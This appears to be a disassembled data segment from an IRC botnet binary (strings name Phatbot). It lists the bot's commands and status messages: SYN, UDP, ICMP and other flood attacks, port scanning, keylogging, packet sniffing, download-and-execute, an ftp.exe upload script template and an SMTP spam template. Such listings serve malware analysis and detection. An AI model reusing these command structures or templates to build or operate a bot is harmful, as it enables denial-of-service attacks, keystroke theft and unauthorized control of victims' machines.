db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 10h
unk_42D370 db 2Dh ; - ; DATA XREF: sub_40274D:loc_408BC3�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0
align 4
unk_42D3A8 db 2Dh ; - ; DATA XREF: sub_40274D+6457�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToStar_1 db 'Failed to start flood thread, error: <%d>.',0
align 10h
unk_42D3E0 db 2Dh ; - ; DATA XREF: sub_40274D+63ED�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
dword_42D40C dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_40274D+636A�o
aFailedToStar_2 db '- Failed to start clone thread, error: <%d>.',0
align 4
dword_42D448 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_40274D+6307�o
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 4
unk_42D478 db 2Dh ; - ; DATA XREF: sub_40274D+625F�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToStar_3 db 'Failed to start flood thread, error: <%d>.',0
align 10h
unk_42D4B0 db 2Dh ; - ; DATA XREF: sub_40274D+61FD�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0
align 10h
unk_42D4E0 db 2Dh ; - ; DATA XREF: sub_40274D+616A�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToStar_4 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42D518 db 2Dh ; - ; DATA XREF: sub_40274D+6108�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 4
unk_42D548 db 2Dh ; - ; DATA XREF: sub_40274D+6086�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToStar_5 db 'Failed to start flood thread, error: <%d>.',0
align 10h
unk_42D580 db 2Dh ; - ; DATA XREF: sub_40274D+6024�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_42D5BC db 2Dh ; - ; DATA XREF: sub_40274D+5FA2�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0
align 4
unk_42D5FC db 2Dh ; - ; DATA XREF: sub_40274D+5F49�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_42D628 db 2Dh ; - ; DATA XREF: sub_40274D+5E6B�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
unk_42D66C db 2Dh ; - ; DATA XREF: sub_40274D+5E12�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
unk_42D6A8 db 2Dh ; - ; DATA XREF: sub_40274D+5D1C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0
align 4
aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_40274D+5C76�o
align 4
aSSS_0 db '[%s] * %s %s',0 ; DATA XREF: sub_40274D+5B99�o
align 4
dword_42D704 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40274D+5B05�o
; sub_40274D+6D82�o
unk_42D710 db 2Dh ; - ; DATA XREF: sub_40274D+5A8F�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_6 db 'Failed to start scan thread, error: <%d>.',0
align 10h
unk_42D750 db 2Dh ; - ; DATA XREF: sub_40274D+5A36�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 10h
unk_42D7A0 db 2Dh ; - ; DATA XREF: sub_40274D+598D�o
; sub_40274D+5D75�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0
align 4
unk_42D7D8 db 2Dh ; - ; DATA XREF: sub_40274D+5934�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanStart db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 10h
unk_42D840 db 2Dh ; - ; DATA XREF: sub_40274D+57C0�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_8 db 'Failed to start scan, no IP specified.',0
align 4
unk_42D874 db 2Dh ; - ; DATA XREF: sub_40274D+5763�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStar_9 db 'Failed to start scan, port is invalid.',0
align 4
unk_42D8A8 db 2Dh ; - ; DATA XREF: sub_40274D:loc_407D92�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s failed.',0
align 4
unk_42D8D8 db 2Dh ; - ; DATA XREF: sub_40274D+563E�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s',0
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40274D+5625�o
aSS_2 db '-s:%s',0 ; DATA XREF: sub_40274D+560E�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40274D+55EE�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aAb db 'ab',0 ; DATA XREF: sub_40274D+55CA�o
; seg000:00414B6A�o
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40274D+55B9�o
align 4
unk_42D948 db 2Dh ; - ; DATA XREF: sub_40274D+5560�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 4
aUpload db 'upload',0 ; DATA XREF: sub_40274D+553D�o
align 10h
unk_42D970 db 2Dh ; - ; DATA XREF: sub_40274D+550A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScanni db 'Already %d scanning threads. Too many specified.',0
align 10h
unk_42D9B0 db 2Dh ; - ; DATA XREF: sub_40274D+54C2�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_10 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42D9E8 db 2Dh ; - ; DATA XREF: sub_40274D+5463�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 10h
unk_42DA30 db 2Dh ; - ; DATA XREF: sub_40274D+53AD�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 4
unk_42DA64 db 2Dh ; - ; DATA XREF: sub_40274D+537C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_42DA98 db 2Dh ; - ; DATA XREF: sub_40274D+536C�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 10h
unk_42DAD0 db 2Dh ; - ; DATA XREF: sub_40274D+52BF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40274D+52A2�o
align 4
unk_42DB24 db 2Dh ; - ; DATA XREF: sub_40274D+5278�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_11 db 'Failed to start flood thread, error: <%d>.',0
align 10h
unk_42DB60 db 2Dh ; - ; DATA XREF: sub_40274D+521F�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
unk_42DBA8 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4078C4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0
align 10h
unk_42DBE0 db 2Dh ; - ; DATA XREF: sub_40274D+5158�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_12 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_42DC18 db 2Dh ; - ; DATA XREF: sub_40274D+50F4�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_40274D+50E4�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40274D+50DD�o
unk_42DC5C db 2Dh ; - ; DATA XREF: sub_40274D+504B�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_40274D+503B�o
; seg000:00416D30�o
align 10h
aAck db 'ack',0 ; DATA XREF: sub_40274D+5024�o
; seg000:00416D10�o
aHcon db 'hcon',0 ; DATA XREF: sub_40274D+4FB1�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_40274D+4F9E�o
unk_42DCA4 db 2Dh ; - ; DATA XREF: sub_40274D+4F82�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40274D+4F0E�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
aEmail db 'email',0 ; DATA XREF: sub_40274D+4E23�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_40274D+4E0C�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_40274D+4DF5�o
align 4
aP: ; DATA XREF: sub_40274D+4DDE�o
; seg002:00442EF8�o ...
unicode 0, <p>,0
aPing_0 db 'ping',0 ; DATA XREF: sub_40274D+4DC7�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_40274D+4DB0�o
align 4
aNs db 'ns',0 ; DATA XREF: sub_40274D+4D99�o
align 4
aNetsend db 'netsend',0 ; DATA XREF: sub_40274D+4D82�o
aU: ; DATA XREF: sub_40274D+4D6B�o
; seg002:00442EF0�o ...
unicode 0, <u>,0
aUdp db 'udp',0 ; DATA XREF: sub_40274D+4D54�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_40274D+4D3D�o
align 4
aAsc db 'asc',0 ; DATA XREF: sub_40274D+4D26�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_40274D+4D0F�o
aPsc db 'psc',0 ; DATA XREF: sub_40274D+4CF8�o
aPortscan db 'portscan',0 ; DATA XREF: sub_40274D+4CE1�o
align 10h
aC_a db 'c_a',0 ; DATA XREF: sub_40274D+4CBB�o
aC_action db 'c_action',0 ; DATA XREF: sub_40274D+4CA4�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_40274D+4C8D�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_40274D+4C76�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_40274D+4C5F�o
align 4
aScan_0 db 'scan',0 ; DATA XREF: sub_40274D+4C48�o
align 10h
aRd db 'rd',0 ; DATA XREF: sub_40274D+4C31�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_40274D+4C1A�o
align 10h
aDl db 'dl',0 ; DATA XREF: sub_40274D+4C03�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_40274D+4BEC�o
align 10h
aWonk db 'wonk',0 ; DATA XREF: sub_40274D+4BD5�o
align 4
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_40274D+4BBE�o
align 4
dword_42DDE4 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_40274D+4B9C�o
aFailedToSta_13 db '- Failed to start flood thread, error: <%d>.',0
align 10h
dword_42DE20 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_40274D+4B3A�o
aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0
aSkysyn db 'skysyn',0 ; DATA XREF: sub_40274D+4AC3�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_40274D+4AAC�o
; sub_40274D+500C�o ...
aSynflood db 'synflood',0 ; DATA XREF: sub_40274D+4A95�o
align 4
unk_42DE68 db 2Dh ; - ; DATA XREF: sub_40274D+4A73�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFailedToSta_14 db '- Failed to start flood thread, error: <%d>.',0
align 4
aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_40274D+49B5�o
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_40274D+499E�o
; sub_415825:loc_41594D�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_40274D+4987�o
; sub_415825:loc_415931�o
align 4
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_40274D+4970�o
; sub_415825+ED�o
align 4
aC: ; DATA XREF: sub_40274D+4959�o
; sub_40FDC3+78�o ...
unicode 0, <c>,0
aClone_0 db 'clone',0 ; DATA XREF: sub_40274D+4942�o
align 4
aIcmp db 'icmp',0 ; DATA XREF: sub_40274D+491C�o
align 4
aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_40274D+4905�o
align 4
aMv db 'mv',0 ; DATA XREF: sub_40274D+48EE�o
align 4
aRename db 'rename',0 ; DATA XREF: sub_40274D+48D7�o
align 4
aFf db 'ff',0 ; DATA XREF: sub_40274D+48C0�o
align 4
aFindfile db 'findfile',0 ; DATA XREF: sub_40274D+48A9�o
align 4
aE: ; DATA XREF: sub_40274D+4892�o
; seg002:00442EE0�o ...
unicode 0, <e>,0
aExecute db 'execute',0 ; DATA XREF: sub_40274D+487B�o
aUpdate db 'update',0 ; DATA XREF: sub_40274D+484D�o
align 4
aDe db 'de',0 ; DATA XREF: sub_40274D+4836�o
align 4
aDelay db 'delay',0 ; DATA XREF: sub_40274D+481F�o
align 4
aRp db 'rp',0 ; DATA XREF: sub_40274D+4808�o
align 4
aRepeat db 'repeat',0 ; DATA XREF: sub_40274D+47F1�o
; sub_40274D+68A6�o
align 10h
aTsn db 'tsn',0 ; DATA XREF: sub_40274D+47DA�o
aTsunami db 'tsunami',0 ; DATA XREF: sub_40274D+47C3�o
aT3 db 't3',0 ; DATA XREF: sub_40274D+47AC�o
align 10h
aTarga3 db 'targa3',0 ; DATA XREF: sub_40274D+4795�o
align 4
aC_p db 'c_p',0 ; DATA XREF: sub_40274D+477E�o
aC_part db 'c_part',0 ; DATA XREF: sub_40274D+4767�o
align 4
aC_j db 'c_j',0 ; DATA XREF: sub_40274D+4750�o
aC_join db 'c_join',0 ; DATA XREF: sub_40274D+4739�o
align 10h
aC_n db 'c_n',0 ; DATA XREF: sub_40274D+4722�o
aC_nick db 'c_nick',0 ; DATA XREF: sub_40274D+470B�o
align 4
aC_m db 'c_m',0 ; DATA XREF: sub_40274D+46F4�o
aC_mode db 'c_mode',0 ; DATA XREF: sub_40274D+46DD�o
align 4
aC_r db 'c_r',0 ; DATA XREF: sub_40274D+46C6�o
aC_raw db 'c_raw',0 ; DATA XREF: sub_40274D+46AF�o
align 4
aM_0: ; DATA XREF: sub_40274D+4698�o
; seg002:00442F38�o ...
unicode 0, <m>,0
aCy db 'cy',0 ; DATA XREF: sub_40274D+466A�o
align 4
aCycle db 'cycle',0 ; DATA XREF: sub_40274D+4653�o
align 4
aA: ; DATA XREF: sub_40274D+463C�o
; seg002:00442EFC�o
unicode 0, <a>,0
aAction db 'action',0 ; DATA XREF: sub_40274D+4625�o
align 10h
aPrivmsg_0 db 'privmsg',0 ; DATA XREF: sub_40274D+45F7�o
aAa db 'aa',0 ; DATA XREF: sub_40274D+45E0�o
align 4
aAddalias db 'addalias',0 ; DATA XREF: sub_40274D+45C9�o
align 4
aKl db 'kl',0 ; DATA XREF: sub_40274D+45B2�o
align 4
aKilllog db 'killlog',0 ; DATA XREF: sub_40274D+459B�o
aGh db 'gh',0 ; DATA XREF: sub_40274D+4575�o
align 4
aGethost db 'gethost',0 ; DATA XREF: sub_40274D+4560�o
aCap db 'cap',0 ; DATA XREF: sub_40274D+454B�o
aCapture db 'capture',0 ; DATA XREF: sub_40274D+4536�o
unk_42DFEC db 2Dh ; - ; DATA XREF: sub_40274D:loc_406C3A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aCommandUnknown db '- Command unknown.',0
unk_42E008 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406C33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aNoMessageSpeci db '- No message specified.',0
align 4
unk_42E02C db 2Dh ; - ; DATA XREF: sub_40274D:loc_406BED�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListFailed db '- User list failed.',0
align 4
unk_42E04C db 2Dh ; - ; DATA XREF: sub_40274D+4499�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListComple db '- User list completed.',0
unk_42E06C db 2Dh ; - ; DATA XREF: sub_40274D:loc_406B62�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListFaile db '- Share list failed.',0
align 4
unk_42E08C db 2Dh ; - ; DATA XREF: sub_40274D+440B�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListCompl db '- Share list completed.',0
align 10h
aShare db 'share',0 ; DATA XREF: sub_40274D+43A8�o
align 4
aContinue db 'continue',0 ; DATA XREF: sub_40274D+436E�o
align 4
aPause db 'pause',0 ; DATA XREF: sub_40274D+4351�o
align 4
aStop db 'stop',0 ; DATA XREF: sub_40274D+4337�o
align 4
unk_42E0D4 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406A77�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListFai db '- Service list failed.',0
unk_42E0F4 db 2Dh ; - ; DATA XREF: sub_40274D+4320�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aServiceListCom db '- Service list completed.',0
align 4
aStart db 'start',0 ; DATA XREF: sub_40274D+42CD�o
align 10h
unk_42E120 db 2Dh ; - ; DATA XREF: sub_40274D+429E�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aFailedToLoadAd db '- Failed to load advapi32.dll or netapi32.dll.',0
aNet db 'net',0 ; DATA XREF: sub_40274D+427A�o
dword_42E15C dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+422C�o
aFailedToStartL db '- Failed to start logging thread, error: <%d>.',0
align 4
dword_42E198 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+41D3�o
aKeyLoggerActiv db '- Key logger active.',0
align 4
dword_42E1BC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+415A�o
aAlreadyRunning db '- Already running.',0
align 4
dword_42E1DC dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D:loc_406891�o
aNoKeyLoggerThr db '- No key logger thread found.',0
align 4
dword_42E208 dd 234032Dh, 6C79656Bh, 302676Fh ; DATA XREF: sub_40274D+413A�o
aKeyLoggerStopp db '- Key logger stopped. (%d thread(s) stopped.)',0
align 4
aFile db 'file',0 ; DATA XREF: sub_40274D+40FE�o
align 4
aKeylog db 'keylog',0 ; DATA XREF: sub_40274D+40D9�o
align 4
dword_42E254 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D:loc_40681B�o
aNoThreadFound_ db '- No thread found.',0
align 4
dword_42E274 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+40C4�o
aServerStopped_ db '- Server stopped. (%d thread(s) stopped.)',0
align 4
dword_42E2AC dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+4094�o
aFailedToSta_15 db '- Failed to start server, error: <%d>.',0
align 10h
dword_42E2E0 dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D:loc_406794�o
aServerRunningO db '- Server running on Port: 113.',0
align 4
dword_42E30C dd 234032Dh, 6E656469h, 3026474h ; DATA XREF: sub_40274D+403D�o
aAlreadyRunni_0 db '- Already running.',0
align 4
aIdent db 'ident',0 ; DATA XREF: sub_40274D+4004�o
align 4
unk_42E334 db 2Dh ; - ; DATA XREF: sub_40274D:loc_406746�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aNoPhatbotSniff db '- No Phatbot sniffer thread found.',0
align 8
unk_42E368 db 2Dh ; - ; DATA XREF: sub_40274D+3FEF�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotSniffer db '- Phatbot sniffer stopped. (%d thread(s) stopped.)',0
unk_42E3A8 db 2Dh ; - ; DATA XREF: sub_40274D+3FAA�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFailedToSta_16 db '- Failed to start sniffer thread, error: <%d>.',0
unk_42E3E4 db 2Dh ; - ; DATA XREF: sub_40274D+3F51�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aPhatbotPacketS db '- Phatbot packet sniffer active.',0
align 4
unk_42E414 db 2Dh ; - ; DATA XREF: sub_40274D+3EF3�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aAlreadyRunni_1 db '- Already running.',0
aSniffer db 'sniffer',0 ; DATA XREF: sub_40274D+3EBC�o
dword_42E43C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D:loc_4065FE�o
aNoCarnivoreThr db '- No Carnivore thread found.',0
align 4
dword_42E468 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3EA7�o
aCarnivoreStopp db '- Carnivore stopped. (%d thread(s) stopped.)',0
align 4
dword_42E4A4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3E62�o
aFailedToSta_17 db '- Failed to start sniffer thread, error: <%d>.',0
align 10h
dword_42E4E0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3E09�o
aCarnivorePacke db '- Carnivore packet sniffer active.',0
align 10h
dword_42E510 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_40274D+3DAB�o
aAlreadyRunni_2 db '- Already running.',0
align 10h
aOn db 'on',0 ; DATA XREF: sub_40274D+3D8B�o
; sub_40274D+3ED3�o ...
align 4
aPsniff db 'psniff',0 ; DATA XREF: sub_40274D+3D74�o
align 4
aRf db 'rf',0 ; DATA XREF: sub_40274D+3D5F�o
align 10h
aReadfile db 'readfile',0 ; DATA XREF: sub_40274D+3D4A�o
align 4
aCm db 'cm',0 ; DATA XREF: sub_40274D+3D35�o
align 10h
aCmd db 'cmd',0 ; DATA XREF: sub_40274D+3D20�o
aMirc db 'mirc',0 ; DATA XREF: sub_40274D+3D0B�o
align 4
aMirccmd db 'mirccmd',0 ; DATA XREF: sub_40274D+3CF6�o
aV: ; DATA XREF: sub_40274D+3CE1�o
; seg002:00442F2C�o ...
unicode 0, <v>,0
aVisit db 'visit',0 ; DATA XREF: sub_40274D+3CCC�o
align 10h
aLi db 'li',0 ; DATA XREF: sub_40274D+3CB7�o
align 4
aList db 'list',0 ; DATA XREF: sub_40274D+3CA2�o
align 4
aGt db 'gt',0 ; DATA XREF: sub_40274D+3C8D�o
align 10h
aDel db 'del',0 ; DATA XREF: sub_40274D+3C63�o
aDelete db 'delete',0 ; DATA XREF: sub_40274D+3C4E�o
; sub_40274D+438B�o
align 4
aKi db 'ki',0 ; DATA XREF: sub_40274D+3C39�o
align 10h
aKill db 'kill',0 ; DATA XREF: sub_40274D+3C24�o
align 4
aKp db 'kp',0 ; DATA XREF: sub_40274D+3C0F�o
align 4
aKillproc db 'killproc',0 ; DATA XREF: sub_40274D+3BFA�o
align 4
aDn db 'dn',0 ; DATA XREF: sub_40274D+3BE5�o
align 4
aDns db 'dns',0 ; DATA XREF: sub_40274D+3BD0�o
aSe db 'se',0 ; DATA XREF: sub_40274D+3BBB�o
align 4
aO: ; DATA XREF: sub_40274D+3B91�o
; seg002:0044325C�o
unicode 0, <o>,0
aOpen db 'open',0 ; DATA XREF: sub_40274D+3B7C�o
; sub_40274D+562A�o ...
align 10h
aPr db 'pr',0 ; DATA XREF: sub_40274D+3B67�o
align 4
aPrefix db 'prefix',0 ; DATA XREF: sub_40274D+3B52�o
align 4
aC_rn db 'c_rn',0 ; DATA XREF: sub_40274D+3B3D�o
align 4
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_40274D+3B28�o
align 10h
aC_q db 'c_q',0 ; DATA XREF: sub_40274D+3B13�o
aC_quit db 'c_quit',0 ; DATA XREF: sub_40274D+3AFE�o
align 4
aK: ; DATA XREF: sub_40274D+3AE9�o
; seg002:00442F18�o ...
unicode 0, <k>,0
aKillthread db 'killthread',0 ; DATA XREF: sub_40274D+3AD4�o
align 4
aRaw db 'raw',0 ; DATA XREF: sub_40274D+3AAA�o
aPt db 'pt',0 ; DATA XREF: sub_40274D+3A95�o
align 4
aJ: ; DATA XREF: sub_40274D+3A6B�o
; seg002:00442F14�o ...
unicode 0, <j>,0
aN: ; DATA XREF: sub_40274D+3A41�o
; seg002:00442F34�o ...
unicode 0, <n>,0
unk_42E60C db 2Dh ; - ; DATA XREF: sub_40274D+3A10�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_40274D+39AC�o
aRegister db 'register',0 ; DATA XREF: sub_40274D+3989�o
align 4
aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_40274D+3933�o
align 4
aMix db 'mix',0 ; DATA XREF: sub_40274D+3878�o
dword_42E66C dd 56495250h, 2047534Dh, 3A207325h, 6E696601h, 1726567h
; DATA XREF: sub_40274D+3827�o
; sub_40274D+385B�o
dd 0
dword_42E684 dd 56495250h, 2047534Dh, 3A207325h, 72657601h, 6E6F6973h
; DATA XREF: sub_40274D+37F3�o
dd 1
dword_42E69C dd 56495250h, 2047534Dh, 3A207325h, 6E697001h, 167h
; DATA XREF: sub_40274D+37BF�o
; sub_40274D+38C1�o
aCtcp db 'ctcp',0 ; DATA XREF: sub_40274D+3776�o
align 4
aNoticeSS_1 db 'NOTICE %s :%s',0 ; DATA XREF: sub_40274D+36E7�o
; sub_40274D+3720�o ...
align 4
aNotice_0 db 'notice',0 ; DATA XREF: sub_40274D+3699�o
align 10h
aMsg db 'msg',0 ; DATA XREF: sub_40274D+35BC�o
aChgnick db 'chgnick',0 ; DATA XREF: sub_40274D+3576�o
aNick_0 db 'nick',0 ; DATA XREF: sub_40274D+347C�o
; sub_40274D+3A2C�o
align 4
dword_42E6E4 dd 56495250h, 2047534Dh, 3A207325h, 43434401h, 4E455320h
; DATA XREF: sub_40274D+345F�o
dd 64252044h, 2064252Eh, 25206425h, 64252064h, 1
